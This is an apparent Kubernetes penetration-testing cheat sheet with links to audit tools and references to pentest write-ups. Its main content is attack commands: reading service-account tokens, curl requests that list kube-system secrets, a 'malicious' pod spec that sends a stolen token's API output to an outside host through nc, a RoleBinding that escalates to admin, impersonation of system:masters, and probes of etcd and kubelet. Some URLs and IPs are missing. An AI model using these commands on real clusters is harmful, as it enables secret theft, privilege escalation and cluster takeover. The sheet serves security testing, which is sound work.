
202 lines
6.7 KiB
Raw Normal View History

# Kubernetes
> Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation.
## Summary
- [Tools](#tools)
- [RBAC Configuration](#rbac-configuration)
- [Listing Secrets](#listing-secrets)
- [Access Any Resource or Verb](#access-any-resource-or-verb)
- [Pod Creation](#pod-creation)
- [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec)
- [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings)
- [Impersonating a Privileged Account](#impersonating-a-privileged-account)
- [Privileged Service Account Token](#privileged-service-account-token)
- [Interesting endpoints to reach](#interesting-endpoints-to-reach)
- [API addresses that you should know](#api-addresses-that-you-should-know)
- [References](#references)
## Tools
2020-12-18 22:46:28 +11:00
* [kubeaudit]( - Audit Kubernetes clusters against common security concerns
* []( - Security risk analysis for Kubernetes resources
* [kube-bench]( - Checks whether Kubernetes is deployed securely by running [CIS Kubernetes Benchmark](
* [kube-hunter]( - Hunt for security weaknesses in Kubernetes clusters
* [katacoda]( - Learn Kubernetes using interactive broser-based scenarios
2020-03-29 16:48:09 +02:00
## Service Token
> As it turns out, when pods (a Kubernetes abstraction for a group of containers) are created they are automatically assigned the default service account, and a new volume is created containing the token for accessing the Kubernetes API. That volume is then mounted into all the containers in the pod.
$ cat /var/run/secrets/
# kubectl makes cluster compromise trivial as it will use that serviceaccount token without additional prompting
## RBAC Configuration
### Listing Secrets
An attacker that gains access to list secrets in the cluster can use the following curl commands to get all secrets in "kube-system" namespace.
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
### Access Any Resource or Verb
- '*'
- '*'
### Pod Creation
Check your right with `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`.
Then create a malicious pod.yaml file.
apiVersion: v1
kind: Pod
name: alpine
namespace: kube-system
- name: alpine
image: alpine
command: ["/bin/sh"]
args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/ | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json"; } | nc -nv 6666; sleep 100000']
serviceAccountName: bootstrap-signer
automountServiceAccountToken: true
hostNetwork: true
Then `kubectl apply -f malicious-pod.yaml`
### Privilege to Use Pods/Exec
kubectl exec -it <POD NAME> -n <PODS NAMESPACE> - sh
### Privilege to Get/Patch Rolebindings
The purpose of this JSON file is to bind the admin "CluserRole" to the compromised service account.
Create a malicious RoleBinging.json file.
"apiVersion": "",
"kind": "RoleBinding",
"metadata": {
"name": "malicious-rolebinding",
"namespcaes": "default"
"roleRef": {
"apiGroup": "*",
"kind": "ClusterRole",
"name": "admin"
"subjects": [
"kind": "ServiceAccount",
"name": "sa-comp"
"namespace": "default"
curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/apis/ -d @malicious-RoleBinging.json
curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret
### Impersonating a Privileged Account
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
## Privileged Service Account Token
$ cat /run/secrets/
$ curl -k -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
## Interesting endpoints to reach
# List Pods
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/
# List secrets
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
# List deployments
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/deployments
# List daemonsets
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
## API addresses that you should know
*(External network visibility)*
### cAdvisor
curl -k https://<IP Address>:4194
### Insecure API server
curl -k https://<IP Address>:8080
### Secure API Server
curl -k https://<IP Address>:(8|6)443/swaggerapi
curl -k https://<IP Address>:(8|6)443/healthz
curl -k https://<IP Address>:(8|6)443/api/v1
### etcd API
curl -k https://<IP address>:2379
curl -k https://<IP address>:2379/version
2019-11-06 18:32:29 +01:00
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
### Kubelet API
curl -k https://<IP address>:10250
curl -k https://<IP address>:10250/metrics
curl -k https://<IP address>:10250/pods
### kubelet (Read only)
curl -k https://<IP Address>:10255
2019-11-06 18:32:29 +01:00
## References
- [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](
2020-03-29 16:48:09 +02:00
- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](
- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](